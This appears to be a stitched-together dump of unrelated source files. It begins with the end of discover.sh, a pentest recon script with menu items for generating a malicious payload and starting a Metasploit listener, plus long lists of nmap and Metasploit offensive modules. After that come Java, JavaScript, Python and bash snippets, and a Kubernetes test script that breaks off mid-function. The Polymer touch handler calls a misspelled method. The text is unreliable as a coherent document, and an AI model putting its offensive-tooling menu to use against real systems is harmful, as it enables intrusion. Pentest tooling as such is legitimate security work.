# referenced by discover.sh and its .rc resources, writing anything new to
# $home/data/updates.txt. The long egrep alternations are explicit
# exclude-lists of modules deliberately not used.
# Remove nmap scripts not being used
ls -l /usr/share/nmap/scripts/ | awk '{print $9}' | cut -d '.' -f1 | egrep -v '(address-info|ajp-auth|ajp-headers|allseeingeye-info|asn-query|auth-owners|auth-spoof|broadcast|brute|citrix-enum-apps-xml|citrix-enum-servers-xml|clock-skew|creds-summary|daap-get-library|discover|dns-brute|dns-check-zone|dns-client-subnet-scan|dns-fuzz|dns-ip6-arpa-scan|dns-srv-enum|dns-nsec3-enum|domcon-cmd|duplicates|eap-info|fcrdns|fingerprint-strings|firewalk|firewall-bypass|ftp-libopie|ftp-libopie|ganglia-info|hnap-info|hostmap-bfk|hostmap-ip2hosts|hostmap-robtex|http|iax2-version|informix-query|informix-tables|ip-forwarding|ip-geolocation|ipidseq|ipv6|irc-botnet-channels|irc-info|irc-unrealircd-backdoor|isns-info|jdwp-exec|jdwp-info|jdwp-inject|krb5-enum-users|ldap-novell-getpass|ldap-search|llmnr-resolve|metasploit-info|mmouse-exec|ms-sql-config|mrinfo|ms-sql-hasdbaccess|ms-sql-query|ms-sql-tables|ms-sql-xp-cmdshell|mtrace|murmur-version|mysql-audit|mysql-enum|mysql-dump-hashes|mysql-query|nat-pmp-info|nat-pmp-mapport|netbus-info|ntp-info|omp2-enum-targets|oracle-enum-users|ovs-agent-version|p2p-conficker|path-mtu|pjl-y-message|quake1-info|quake3-info|quake3-master-getservers|qscan|resolveall|reverse-index|rpc-grind|rpcap-info|rusers|shodan-api|script|sip-call-spoof|skypev2-version|smb-flood|smb-ls|smb-print-text|smb-psexec|sniffer-detect|snmp-ios-config|socks-open-proxy|sql-injection|ssh-hostkey|ssh2-enum-algos|sshv1|stun-info|teamspeak2-version|targets|tftp-enum|tor-consensus-checker|traceroute-geolocation|unittest|unusual-port|upnp-info|url-snarf|ventrilo-info|vtam-enum|vuln-cve|vuze-dht-info|weblogic-t3-info|whois|xmlrpc-methods|xmpp-info)' > tmp
# Extract the nmap scripts discover.sh already invokes (--script=...).
grep 'script=' discover.sh | egrep -v '(discover.sh|22.txt|smtp.txt)' | cut -d '=' -f2- | cut -d ' ' -f1 | tr ',' '\n' | egrep -v '(db2-discover|dhcp-discover|dns-service-discovery|http-email-harvest|http-grep|membase-http-info|oracle-sid-brute|smb-os-discovery|tn3270-info)' | sort -u > tmp2
echo "New modules to be added." > tmp-updates
echo >> tmp-updates
echo >> tmp-updates
echo "Nmap scripts" >> tmp-updates
echo "==============================" >> tmp-updates
diff tmp tmp2 | egrep '^[<>]' | awk '{print $2}' | sed '/^$/d' | egrep -v '(clamav-exec|iec-identify|ntp-info|smb*|smtp-commands|smtp-enum-users|smtp-ntlm-info|smtp-open-relay|smtp-strangeport|smtp-vuln*|ssl*|tls-ticketbleed|tls-nextprotoneg|tmp)' >> tmp-updates
rm tmp
echo >> tmp-updates
echo >> tmp-updates
echo "Metasploit auxiliary/scanners" >> tmp-updates
echo "==============================" >> tmp-updates
# Not included: http sap
categories="afp backdoor chargen couchdb db2 dcerpc dect discovery emc finger ftp h323 imap ip ipmi lotus misc mongodb motorola msf mssql mysql natpmp nessus netbios nexpose nfs ntp openvas oracle pcanywhere pop3 portscan postgres printer rdp rogue rservices scada sip smb smtp snmp ssh telephony telnet tftp upnp vmware vnc voice vxworks winrm x11"
for i in $categories; do
ls -l /usr/share/metasploit-framework/modules/auxiliary/scanner/$i | awk '{print $9}' | cut -d '.' -f1 >> tmp
done
sed '/^$/d' tmp > tmp2
# Remove Metasploit scanners not used
egrep -v '(ack|apache_karaf_command_execution|arp_sweep|call_scanner|cerberus_sftp_enumusers|cisco_smart_install|couchdb_enum|dvr_config_disclosure|empty_udp|endpoint_mapper|ftpbounce|hidden|indusoft_ntwebserver_fileaccess|ipidseq|ipv6|login|lotus_domino_hashes|lotus_domino_version|management|ms08_067_check|mysql_file_enum|mysql_hashdump|mysql_schemadump|mysql_writable_dirs|natpmp_portscan|poisonivy_control_scanner|profinet_siemens|psexec_loggedin_users|recorder|rogue_recv|rogue_send|sipdroid_ext_enum|snmp_set|ssh_enumusers|ssh_identify_pubkeys|station_scanner|syn|tcp|tftpbrute|udp_probe|udp_sweep|vmware_enum_users|vmware_enum_permissions|vmware_enum_sessions|vmware_enum_vms|vmware_host_details|vmware_screenshot_stealer|wardial|winrm_cmd|winrm_wql|xmas)' tmp2 | sort > tmp-msf-all
grep 'use ' $discover/resource/*.rc | grep -v 'recon-ng' > tmp
# Print from the last /, to the end of the line
sed -e 's:.*/\(.*\):\1:g' tmp > tmp-msf-used
grep -v -f tmp-msf-used tmp-msf-all >> tmp-updates
echo >> tmp-updates
echo >> tmp-updates
echo "recon-ng" >> tmp-updates
echo "==============================" >> tmp-updates
python /usr/share/recon-ng/recon-cli -M | grep '/'| egrep -v '(exploitation|import|reporting)' | sed 's/^[ \t]*//' > tmp
cat tmp | egrep -iv '(adobe|bozocrack|brute_suffix|cache_snoop|dev_diver|freegeoip|fullcontact|gists_search|github_commits|github_dorks|github_repos|github_users|google_site_web|hashes_org|interesting_files|ipinfodb|ipstack|jigsaw|linkedin_auth|locations|mailtester|mangle|metacrawler|migrate_contacts|migrate_hosts|namechk|pgp|profiler|pwnedlist|virustotal|vulnerabilities)' > tmp2
cat $discover/resource/recon-ng.rc $discover/resource/recon-ng-active.rc | grep '^use' | awk '{print $2}' | sort -u > tmp3
diff tmp2 tmp3 | grep '/' | grep -v 'netblock' | awk '{print $2}' | sort -u >> tmp-updates
echo >> tmp-updates
echo >> tmp-updates
mv tmp-updates $home/data/updates.txt
rm tmp*
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/updates.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_main(){
# Top-level menu: prints the option list, reads one choice and dispatches to
# the matching f_* handler. Creates $home/data on first run. Option 99 is an
# intentionally unlisted maintenance entry (f_updates).
clear
f_banner
if [ ! -d $home/data ]; then
mkdir -p $home/data
fi
echo -e "${BLUE}RECON${NC}" # In MacOS X, using \x1B instead of \e. \033 would be ok for all platforms.
echo "1. Domain"
echo "2. Person"
echo "3. Parse salesforce"
echo
echo -e "${BLUE}SCANNING${NC}"
echo "4. Generate target list"
echo "5. CIDR"
echo "6. List"
echo "7. IP, range, or URL"
echo "8. Rerun Nmap scripts and MSF aux"
echo
echo -e "${BLUE}WEB${NC}"
echo "9. Insecure direct object reference"
echo "10. Open multiple tabs in $browser"
echo "11. Nikto"
echo "12. SSL"
echo
echo -e "${BLUE}MISC${NC}"
echo "13. Parse XML"
echo "14. Generate a malicious payload"
echo "15. Start a Metasploit listener"
echo "16. Update"
echo "17. Exit"
echo
echo -n "Choice: "
read choice
# f_errorOSX guards the options that are not supported on macOS.
case $choice in
1) f_errorOSX; f_domain;;
2) f_person;;
3) f_salesforce;;
4) f_generateTargetList;;
5) f_cidr;;
6) f_list;;
7) f_single;;
8) f_errorOSX; f_enumerate;;
9) f_directObjectRef;;
10) f_multitabs;;
11) f_errorOSX; f_nikto;;
12) f_ssl;;
13) f_parse;;
14) f_payload;;
15) f_listener;;
16) f_errorOSX; $discover/update.sh && exit;;
17) clear && exit;;
99) f_errorOSX; f_updates;;
*) f_error;;
esac
}
##############################################################################################################
while true; do f_main; done
|
package com.bjdvt.platform.model;
import java.util.Date;
/**
*
*
* @author wcyong
*
* @date 2018-09-12
*/
public class AppUser {
private String id;
private Date createTime;
private String loginName;
private String passwd;
private String wxId;
private String name;
public String getId() {
return id;
}
public void setId(String id) {
this.id = id == null ? null : id.trim();
}
public Date getCreateTime() {
return createTime;
}
public void setCreateTime(Date createTime) {
this.createTime = createTime;
}
public String getLoginName() {
return loginName;
}
public void setLoginName(String loginName) {
this.loginName = loginName == null ? null : loginName.trim();
}
public String getPasswd() {
return passwd;
}
public void setPasswd(String passwd) {
this.passwd = passwd == null ? null : passwd.trim();
}
public String getWxId() {
return wxId;
}
public void setWxId(String wxId) {
this.wxId = wxId == null ? null : wxId.trim();
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name == null ? null : name.trim();
}
}
|
<gh_stars>0
// Kony Visualizer splash-screen controller, split into the framework's three
// standard modules: user code, generated action bindings, and the merged
// controller. Only the user module should be hand-edited.
define("userfrmSplashController", {
    // After the splash form is shown: navigate to frmMain and remove the
    // loading overlay.
    onPostShow: function() {
        const ntf = new kony.mvc.Navigation("frmMain");
        ntf.navigate();
        kony.application.dismissLoadingScreen();
    }
});
define("frmSplashControllerActions", {
    /*
    This is an auto generated file and any modifications to it may result in corruption of the action sequence.
    */
    /** postShow defined for frmSplash **/
    AS_Form_fb47eec1faff4ea19f4dd9cdd556cc40: function AS_Form_fb47eec1faff4ea19f4dd9cdd556cc40(eventobject) {
        var self = this;
        this.onPostShow();
    }
});
// Combine the user controller with the generated action modules.
define("frmSplashController", ["userfrmSplashController", "frmSplashControllerActions"], function() {
    var controller = require("userfrmSplashController");
    var controllerActions = ["frmSplashControllerActions"];
    return kony.visualizer.mixinControllerActions(controller, controllerActions);
});
|
def frequency(str):
    """Return up to the three most frequent whitespace-separated words.

    Ties keep first-appearance order: Counter.most_common is stable for
    equal counts, matching the original stable reverse sort by count.

    Note: the parameter shadows the builtin ``str``; the name is kept for
    interface compatibility with existing callers.
    """
    from collections import Counter

    counts = Counter(str.split())
    return [word for word, _ in counts.most_common(3)]
|
<filename>verita-api/src/main/java/de/cpg/oss/verita/service/Subscription.java
package de.cpg.oss.verita.service;
/**
 * Handle for an active subscription.
 *
 * Extends {@link AutoCloseable} so callers can release the subscription via
 * close() (e.g. in a try-with-resources block). The concrete cancellation
 * semantics are implementation-defined and not visible here.
 */
public interface Subscription extends AutoCloseable {
}
|
from math import floor
import datetime
now=datetime.datetime.now
import os
from os import linesep
from sys import stdout,stderr
import subprocess
import threading
from lib import MM,data,error,clean
d=None
o=None
e=None
r=None
res=""
ec=0
def execute(rd:data):
    """Run the command(s) described by ``rd`` and terminate the interpreter.

    Resolves the stdout/stderr destinations (co2f) and the result stream
    (ro2f) into the module globals o/e/r, dispatches on the multiplicity
    mode, writes the summary text accumulated in ``res`` to the result
    stream, closes the handles and exits with the collected exit code ``ec``.
    """
    global d,o,e,r
    d=rd
    o=co2f(d.out)
    e=co2f(d.err)
    r=ro2f(d.result)
    # Exactly one of these should match; each worker fills res/ec.
    if d.multiple==MM.none: single()
    if d.multiple==MM.serial: serial()
    if d.multiple==MM.spawn: spawn()
    if d.multiple==MM.thread: thread()
    r.write(res)
    close(o)
    close(e)
    close(r)
    exit(ec)
def single():
    """Run the one configured command, recording timing into res/ec."""
    global res,ec
    p=SP(d.command," ".join(d.command))
    st=now()
    p.run()
    en=now()
    # clean() presumably normalizes the indented template -- defined in lib.
    res=clean(f"""
time: {descTime(en-st)}
process id: {p.pid}
{p.descEC()}
""")
    ec=p.ec
def serial():
    """Run the commands one after another, stopping at the first failure.

    ``lp`` (last process) determines the reported exit code: the final
    command if all succeed, otherwise the first one that failed. Processes
    never started keep pid -1 and are shown as 'N/A'.
    """
    global res,ec
    pl=SP.multiple(d.command)
    lp=pl[len(pl)-1]
    st=now()
    for p in pl:
        p.run()
        if p.ec!=0:
            lp=p
            break
    en=now()
    res=linesep.join([
        f"time: {descTime(en-st)}",
        *[
            f"process{p.order} id: {p.pid if p.pid>=0 else 'N/A'}"
            for p in pl
        ],
        f"exit code: {lp.ec}",""
    ])
    ec=lp.ec
def spawn():
    """Start all commands concurrently as child processes, then wait for all."""
    pl=SP.multiple(d.command)
    st=now()
    for p in pl: p.start()
    for p in pl: p.wait()
    en=now()
    SP.collect(pl,st,en)
def thread():
    """Run each command to completion in its own Python thread."""
    pl=SP.multiple(d.command)
    # Each thread blocks in p.run() (start + wait) for its own process.
    tl=[threading.Thread(target=lambda p: p.run(),args=(p,)) for p in pl]
    try:
        st=now()
        for t in tl: t.start()
        for t in tl: t.join()
        en=now()
    except: error("実行に失敗しました")
    SP.collect(pl,st,en)
class SP:
    """One subprocess plus the metadata needed for the result summary."""
    popen:subprocess.Popen
    # args: argv list, or a single shell string (then run with shell=True)
    args=None
    # description: human-readable command text used in error messages
    description=""
    # order: 1-based position when part of a multi-command run
    order=0
    # pid: -1 until started (rendered as 'N/A' by serial())
    pid=-1
    # ec: exit code of the finished process
    ec=0
    def __init__(self,args,desc):
        self.args=args
        self.description=desc
    @classmethod
    def multiple(cls,commands):
        """Wrap each command in an SP, numbering them from 1."""
        n=1
        l=[]
        for c in commands:
            p=SP(c,c)
            p.order=n
            l+=[p]
            n+=1
        return l
    @classmethod
    def collect(cls,pl,st,en):
        """Aggregate pids/exit codes into the module globals res and ec.

        ec becomes the maximum exit code observed across all processes.
        """
        global res,ec
        l=[f"time: {descTime(en-st)}"]
        for p in pl:
            if p.ec>ec: ec=p.ec
            l+=[
                f"process{p.order} id: {p.pid}",
                p.descEC()
            ]
        l+=[""]
        res=linesep.join(l)
    def start(self):
        """Launch the process without waiting; string args run via the shell."""
        global o,e
        s=type(self.args) is str
        try:
            self.popen=subprocess.Popen(self.args,shell=s,stdout=o,stderr=e)
            self.pid=self.popen.pid
        except: error(f"実行に失敗しました: {self.description}")
    def wait(self):
        # Block until the child exits and record its exit code.
        self.ec=self.popen.wait()
    def run(self):
        # Convenience: start and wait in one call.
        self.start()
        self.wait()
    def descEC(self):
        return f"exit code: {self.ec}"
def co2f(d:str):
    """Resolve an output-destination name for subprocess stdout/stderr.

    "inherit" -> None (child inherits our stream); "discard" ->
    subprocess.DEVNULL; anything else is treated as a file path opened for
    append via fh().

    Bug fix: the fallthrough previously called ``fh(d.out)``, but ``d`` is
    already the destination string (``str`` has no ``.out`` attribute), so
    every file-path destination raised AttributeError. It now passes ``d``.
    """
    if d == "inherit":
        return None
    if d == "discard":
        return subprocess.DEVNULL
    return fh(d)
def ro2f(d:str):
    """Resolve the result-destination name to a writable object.

    "stdout"/"stderr" map to the interpreter's standard streams; any other
    value is treated as a file path (opened for append, cached, by fh()).
    """
    if d == "stdout":
        return stdout
    if d == "stderr":
        return stderr
    return fh(d)
def close(fh):
    """Close a handle produced by co2f/ro2f.

    None (inherit) and int sentinels such as subprocess.DEVNULL are left
    untouched; real file objects are closed.
    """
    if fh is None or type(fh) is int:
        return
    fh.close()
# Cache of already-opened append-mode file handles, keyed by path, so the
# same destination file is opened at most once per run.
opened={}
def fh(path):
    """Return an append-mode handle for *path*, reusing a cached one.

    Calls error() (from lib) if the path cannot be opened for writing.
    """
    if path in opened: return opened[path]
    try:
        f=open(path,"a")
        opened[path]=f
        return f
    except: error("指定したパスには書き込みできません: "+path)
def descTime(td):
    """Format a datetime.timedelta as e.g. ``1h 2m 3s 004.500ms``.

    Zero-valued leading units are omitted; the millisecond part (from
    td.microseconds) is always present, zero-padded to 7 characters.

    Bug fix: the original derived hours from ``td.seconds``, which silently
    drops whole days (timedelta normalizes days separately); the total now
    includes ``td.days``. Integer arithmetic also avoids the float rounding
    of the original repeated divide/floor chain.
    """
    total = td.days * 86400 + td.seconds
    hours, rem = divmod(total, 3600)
    minutes, seconds = divmod(rem, 60)
    t = ""
    if hours >= 1: t += "{:.0f}h ".format(hours)
    if minutes >= 1: t += "{:.0f}m ".format(minutes)
    if seconds >= 1: t += "{:.0f}s ".format(seconds)
    t += "{:07.3f}ms".format(td.microseconds / 1e+3)
    return t
def descEC(ec):
    """Describe an exit code; negative values mean the process died on a signal."""
    if ec < 0:
        return "terminated due to signal"
    return f"exit code: {ec}"
|
import java.util.Random;
public class RandomNumberGenerator {
    // Shared generator: constructing a new Random on every call wastes work
    // and, on older JDKs where the seed derives from the clock, rapid calls
    // could produce identical sequences.
    private static final Random RANDOM = new Random();

    /**
     * Returns a uniformly distributed random integer in the range [0, 25].
     */
    public static int generateRandomInteger() {
        return RANDOM.nextInt(26);
    }
}
|
(function($){
    // Persist the admin menu order. Called as the nestable 'change' handler
    // (e is the event) or directly with a jQuery element (e.length truthy).
    var updateMenu = function(e) {
        var list = e.length ? e : $(e.target)
        // POST the serialized tree to the server; response is only logged.
        $.post('/admin-menu',
            JSON.stringify(list.nestable('serialize')),
            function(data) {
                console.log(data);
            }
        );
        // Earlier PUT-based attempts, kept for reference:
        /*$.ajax({
            url: '/admin-menu',
            type: 'PUT',
            dataType: 'application/json',
            data: JSON.stringify(list.nestable('serialize'))
        }).done(function(data) {
            console.log(data);
        });*/
        /*$.ajax({
            url: '/admin-menu',
            type: 'PUT',
            dataType: 'json',
            headers: {
                "Content-Type": "application/json"
            },
            data: JSON.stringify(list.nestable('serialize')),
            success: function (data, textStatus, xhr) {
                console.log(data);
            },
            error: function (xhr, textStatus, errorThrown) {
                console.log('Error in Operation');
            }
        });*/
    }
    // Two-level drag-and-drop menu editor; save on every reorder.
    $('#nestable2').nestable({
        group: 1,
        maxDepth: 2
    }).on('change', updateMenu);
})(jQuery)
|
# Batch-run get_mips.py over the simulation outputs, at most 20 background
# jobs at a time; process_num counts the currently running jobs.
process_num=0;
echo "------------------begin mips.sh----------------------"
ps -auxww | grep zemao | grep sim
let "process_num = 0"
for l1inset in 256; do
for hissize in 19 17 13 5 ; do
let "l1size=21-${hissize}"
#2 4 8 16
let "l2size=(2**(21))"
get_mips.py -f "./output/l1inset_${l1inset}_hissize_${hissize}*.out" -t "./config/l1inset_${l1inset}.cfg" >./output/l1inset_${l1inset}_hissize_${hissize}.mips &
let "process_num = $process_num +1"
echo "there are $process_num processes runing now. hissize_${hissize} l1inset=${l1inset} "
# Throttle: once 20 jobs are in flight, wait for the whole batch to finish
# before starting more, then reset the counter.
if [ $process_num -ge 20 ]; then
wait
let "process_num = 0"
fi
done
done
|
/*
* Copyright 2013 The Polymer Authors. All rights reserved.
* Use of this source code is governed by a BSD-style
* license that can be found in the LICENSE file.
*/
(function(scope) {
var dispatcher = scope.dispatcher;
var findTarget = scope.findTarget;
var allShadows = scope.targetFinding.allShadows.bind(scope.targetFinding);
var pointermap = dispatcher.pointermap;
var touchMap = Array.prototype.map.call.bind(Array.prototype.map);
// This should be long enough to ignore compat mouse events made by touch
var DEDUP_TIMEOUT = 2500;
var ATTRIB = 'touch-action';
var INSTALLER;
var HAS_TOUCH_ACTION = (typeof document.head.style.touchAction) === 'string';
// handler block for native touch events
var touchEvents = {
scrollType: new scope.SideTable,
events: [
'touchstart',
'touchmove',
'touchend',
'touchcancel'
],
register: function(target) {
if (HAS_TOUCH_ACTION) {
dispatcher.listen(target, this.events);
} else {
INSTALLER.enableOnSubtree(target);
}
},
unregister: function(target) {
if (HAS_TOUCH_ACTION) {
dispatcher.unlisten(target, this.events);
} else {
// TODO(dfreedman): is it worth it to disconnect the MO?
}
},
elementAdded: function(el) {
var a = el.getAttribute(ATTRIB);
var st = this.touchActionToScrollType(a);
if (st) {
this.scrollType.set(el, st);
dispatcher.listen(el, this.events);
// set touch-action on shadows as well
allShadows(el).forEach(function(s) {
this.scrollType.set(s, st);
dispatcher.listen(s, this.events);
}, this);
}
},
elementRemoved: function(el) {
this.scrollType.delete(el);
dispatcher.unlisten(el, this.events);
// remove touch-action from shadow
allShadows(el).forEach(function(s) {
this.scrollType.delete(s);
dispatcher.unlisten(s, this.events);
}, this);
},
elementChanged: function(el, oldValue) {
var a = el.getAttribute(ATTRIB);
var st = this.touchActiontoScrollType(a);
var oldSt = this.touchActionToScrollType(oldValue);
// simply update scrollType if listeners are already established
if (st && oldSt) {
this.scrollType.set(el, st);
allShadows(el).forEach(function(s) {
this.scrollType.set(s, st);
}, this);
} else if (oldSt) {
this.elementRemoved(el);
} else if (st) {
this.elementAdded(el);
}
},
scrollTypes: {
EMITTER: 'none',
XSCROLLER: 'pan-x',
YSCROLLER: 'pan-y',
SCROLLER: /^(?:pan-x pan-y)|(?:pan-y pan-x)|auto$/,
},
// Translate a touch-action attribute value into the internal scroll-axis
// code consumed by shouldScroll: 'none' -> 'none' (emit pointer events,
// never scroll), 'pan-x' -> 'X', 'pan-y' -> 'Y', and
// 'pan-x pan-y' / 'pan-y pan-x' / 'auto' -> 'XY' (always scroll).
// Returns undefined for any unrecognized value.
// NOTE(review): the first branch compares against the literal 'none' rather
// than st.EMITTER (same value); st.EMITTER is otherwise unused here.
touchActionToScrollType: function(touchAction) {
  var t = touchAction;
  var st = this.scrollTypes;
  if (t === 'none') {
    return 'none';
  } else if (t === st.XSCROLLER) {
    return 'X';
  } else if (t === st.YSCROLLER) {
    return 'Y';
  } else if (st.SCROLLER.exec(t)) {
    return 'XY';
  }
},
POINTER_TYPE: 'touch',
firstTouch: null,
isPrimaryTouch: function(inTouch) {
return this.firstTouch === inTouch.identifier;
},
setPrimaryTouch: function(inTouch) {
if (this.firstTouch === null) {
this.firstTouch = inTouch.identifier;
this.firstXY = {X: inTouch.clientX, Y: inTouch.clientY};
this.scrolling = false;
}
},
removePrimaryTouch: function(inTouch) {
if (this.isPrimaryTouch(inTouch)) {
this.firstTouch = null;
this.firstXY = null;
}
},
touchToPointer: function(inTouch) {
var e = dispatcher.cloneEvent(inTouch);
// Spec specifies that pointerId 1 is reserved for Mouse.
// Touch identifiers can start at 0.
// Add 2 to the touch identifier for compatibility.
e.pointerId = inTouch.identifier + 2;
e.target = findTarget(e);
e.bubbles = true;
e.cancelable = true;
e.button = 0;
e.buttons = 1;
e.width = inTouch.webkitRadiusX || inTouch.radiusX || 0;
e.height = inTouch.webkitRadiusY || inTouch.radiusY || 0;
e.pressure = inTouch.webkitForce || inTouch.force || 0.5;
e.isPrimary = this.isPrimaryTouch(inTouch);
e.pointerType = this.POINTER_TYPE;
return e;
},
processTouches: function(inEvent, inFunction) {
var tl = inEvent.changedTouches;
var pointers = touchMap(tl, this.touchToPointer, this);
pointers.forEach(inFunction, this);
},
// For single axis scrollers, determines whether the element should emit
// pointer events or behave as a scroller
shouldScroll: function(inEvent) {
if (this.firstXY) {
var ret;
var scrollAxis = this.scrollType.get(inEvent.currentTarget);
if (scrollAxis === 'none') {
// this element is a touch-action: none, should never scroll
ret = false;
} else if (scrollAxis === 'XY') {
// this element should always scroll
ret = true;
} else {
var t = inEvent.changedTouches[0];
// check the intended scroll axis, and other axis
var a = scrollAxis;
var oa = scrollAxis === 'Y' ? 'X' : 'Y';
var da = Math.abs(t['client' + a] - this.firstXY[a]);
var doa = Math.abs(t['client' + oa] - this.firstXY[oa]);
// if delta in the scroll axis > delta other axis, scroll instead of
// making events
ret = da >= doa;
}
this.firstXY = null;
return ret;
}
},
findTouch: function(inTL, inId) {
for (var i = 0, l = inTL.length, t; i < l && (t = inTL[i]); i++) {
if (t.identifier === inId) {
return true;
}
}
},
// In some instances, a touchstart can happen without a touchend. This
// leaves the pointermap in a broken state.
// Therefore, on every touchstart, we remove the touches that did not fire a
// touchend event.
// To keep state globally consistent, we fire a
// pointercancel for this "abandoned" touch
vacuumTouches: function(inEvent) {
var tl = inEvent.touches;
// pointermap.size should be < tl.length here, as the touchstart has not
// been processed yet.
if (pointermap.size >= tl.length) {
var d = [];
pointermap.forEach(function(key, value) {
// Never remove pointerId == 1, which is mouse.
// Touch identifiers are 2 smaller than their pointerId, which is the
// index in pointermap.
if (key !== 1 && !this.findTouch(tl, key - 2)) {
var p = value.out;
d.push(this.touchToPointer(p));
}
}, this);
d.forEach(this.cancelOut, this);
}
},
touchstart: function(inEvent) {
this.vacuumTouches(inEvent);
this.setPrimaryTouch(inEvent.changedTouches[0]);
this.dedupSynthMouse(inEvent);
if (!this.scrolling) {
this.processTouches(inEvent, this.overDown);
}
},
overDown: function(inPointer) {
var p = pointermap.set(inPointer.pointerId, {
target: inPointer.target,
out: inPointer,
outTarget: inPointer.target
});
dispatcher.over(inPointer);
dispatcher.down(inPointer);
},
touchmove: function(inEvent) {
if (!this.scrolling) {
if (this.shouldScroll(inEvent)) {
this.scrolling = true;
this.touchcancel(inEvent);
} else {
inEvent.preventDefault();
this.processTouches(inEvent, this.moveOverOut);
}
}
},
moveOverOut: function(inPointer) {
var event = inPointer;
var pointer = pointermap.get(event.pointerId);
// a finger drifted off the screen, ignore it
if (!pointer) {
return;
}
var outEvent = pointer.out;
var outTarget = pointer.outTarget;
dispatcher.move(event);
if (outEvent && outTarget !== event.target) {
outEvent.relatedTarget = event.target;
event.relatedTarget = outTarget;
// recover from retargeting by shadow
outEvent.target = outTarget;
if (event.target) {
dispatcher.leaveOut(outEvent);
dispatcher.enterOver(event);
} else {
// clean up case when finger leaves the screen
event.target = outTarget;
event.relatedTarget = null;
this.cancelOut(event);
}
}
pointer.out = event;
pointer.outTarget = event.target;
},
touchend: function(inEvent) {
this.dedupSynthMouse(inEvent);
this.processTouches(inEvent, this.upOut);
},
upOut: function(inPointer) {
if (!this.scrolling) {
dispatcher.up(inPointer);
dispatcher.out(inPointer);
}
this.cleanUpPointer(inPointer);
},
touchcancel: function(inEvent) {
this.processTouches(inEvent, this.cancelOut);
},
cancelOut: function(inPointer) {
dispatcher.cancel(inPointer);
dispatcher.out(inPointer);
this.cleanUpPointer(inPointer);
},
cleanUpPointer: function(inPointer) {
pointermap.delete(inPointer.pointerId);
this.removePrimaryTouch(inPointer);
},
// prevent synth mouse events from creating pointer events
dedupSynthMouse: function(inEvent) {
var lts = scope.mouseEvents.lastTouches;
var t = inEvent.changedTouches[0];
// only the primary finger will synth mouse events
if (this.isPrimaryTouch(t)) {
// remember x/y of last touch
var lt = {x: t.clientX, y: t.clientY};
lts.push(lt);
var fn = (function(lts, lt){
var i = lts.indexOf(lt);
if (i > -1) {
lts.splice(i, 1)
}
}).bind(null, lts, lt);
setTimeout(fn, DEDUP_TIMEOUT);
}
}
};
if (!HAS_TOUCH_ACTION) {
INSTALLER = new scope.Installer(touchEvents.elementAdded, touchEvents.elementRemoved, touchEvents.elementChanged, touchEvents);
}
scope.touchEvents = touchEvents;
})(window.PointerEventsPolyfill);
|
#!/usr/bin/env bash
# Copyright 2018 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script validates that binaries can be built and that all tests pass.
set -o errexit
set -o nounset
set -o pipefail
source "$(dirname "${BASH_SOURCE}")/util.sh"
ROOT_DIR="$(cd "$(dirname "$0")/.." ; pwd)"
MAKE_CMD="make -C ${ROOT_DIR}"
NUM_CLUSTERS="${NUM_CLUSTERS:-2}"
JOIN_CLUSTERS="${JOIN_CLUSTERS:-}"
DOWNLOAD_BINARIES="${DOWNLOAD_BINARIES:-}"
CONTAINER_REGISTRY_HOST="${CONTAINER_REGISTRY_HOST:-172.17.0.1:5000}"
COMMON_TEST_CMD="go test -v"
COMMON_TEST_ARGS="./test/e2e -args -ginkgo.v -single-call-timeout=1m -ginkgo.trace -ginkgo.randomizeAllSpecs"
MANAGED_E2E_TEST_CMD="${COMMON_TEST_CMD} -race ${COMMON_TEST_ARGS}"
# Specifying a kube config allows the tests to target deployed (unmanaged) fixture
UNMANAGED_E2E_TEST_CMD="${COMMON_TEST_CMD} ${COMMON_TEST_ARGS} -kubeconfig=${HOME}/.kube/config"
function build-binaries() {
  # Build each federation binary through the repository Makefile, in the
  # same order as before: hyperfed, controller, kubefed2.
  local target
  for target in hyperfed controller kubefed2; do
    ${MAKE_CMD} "${target}"
  done
}
function download-dependencies() {
  # Fetch the test binary dependencies unless DOWNLOAD_BINARIES is
  # unset/empty, in which case this is a no-op.
  if [[ -z "${DOWNLOAD_BINARIES}" ]]; then
    return
  fi
  ./scripts/download-binaries.sh
}
function run-unit-tests() {
  # Run `make test` with the downloaded test binaries (etcd,
  # kube-apiserver) exported where the test framework expects them.
  # Ensure the test binaries are in the path.
  export TEST_ASSET_PATH="${base_dir}/bin"
  export TEST_ASSET_ETCD="${TEST_ASSET_PATH}/etcd"
  export TEST_ASSET_KUBE_APISERVER="${TEST_ASSET_PATH}/kube-apiserver"
  ${MAKE_CMD} test
}
# Run the e2e suite against a managed fixture (the suite launches its own
# etcd/apiserver, so the TEST_ASSET_* variables must point at the binaries).
function run-e2e-tests-with-managed-fixture() {
  local asset_path="${base_dir}/bin"
  export TEST_ASSET_PATH="${asset_path}"
  export TEST_ASSET_ETCD="${asset_path}/etcd"
  export TEST_ASSET_KUBE_APISERVER="${asset_path}/kube-apiserver"
  ${MANAGED_E2E_TEST_CMD}
}
# Echo the space-separated names of the member clusters to join
# (cluster2..clusterN). Honors a caller-provided JOIN_CLUSTERS; otherwise
# derives it from NUM_CLUSTERS and exports the result for later calls.
function join-cluster-list() {
  if [[ -z "${JOIN_CLUSTERS}" ]]; then
    local i
    for i in $(seq 2 "${NUM_CLUSTERS}"); do
      JOIN_CLUSTERS+="cluster${i} "
    done
    # Trim the trailing space with parameter expansion instead of forking
    # an echo|sed pipeline.
    export JOIN_CLUSTERS="${JOIN_CLUSTERS% }"
  fi
  echo "${JOIN_CLUSTERS}"
}
# Run the e2e suite against an already-deployed (unmanaged) federation,
# targeting the clusters selected by ${HOME}/.kube/config.
# NOTE: the command string is intentionally unquoted so it word-splits into
# the go test invocation and its arguments.
function run-e2e-tests-with-unmanaged-fixture() {
  ${UNMANAGED_E2E_TEST_CMD}
}
# Run the unmanaged e2e suite limited to a single namespace ("foo").
function run-namespaced-e2e-tests-with-unmanaged-fixture() {
  local cmd="${UNMANAGED_E2E_TEST_CMD} -federation-namespace=foo -registry-namespace=foo -limited-scope=true"
  # The Placement specs get their own invocation: if teardown leaves
  # namespace placement behind, the crud specs would otherwise fail.
